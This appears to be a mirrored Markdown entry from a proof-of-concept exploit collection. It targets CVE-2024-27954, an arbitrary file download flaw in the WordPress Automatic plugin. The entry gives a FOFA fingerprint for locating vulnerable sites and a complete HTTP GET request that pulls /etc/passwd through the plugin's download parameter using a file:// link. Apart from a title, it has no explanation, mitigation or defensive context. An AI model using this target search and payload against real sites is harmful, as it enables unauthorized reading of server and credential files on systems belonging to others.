mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-29 01:30:21 +00:00
20 lines
526 B
Markdown
20 lines
526 B
Markdown
## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
|
|
|
|
## fofa
|
|
```
|
|
"/wp-content/plugins/wp-automatic"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
|
Connection: close
|
|
Accept: */*
|
|
Accept-Language: en
|
|
Accept-Encoding: gzip
|
|
```
|
|
|
|
|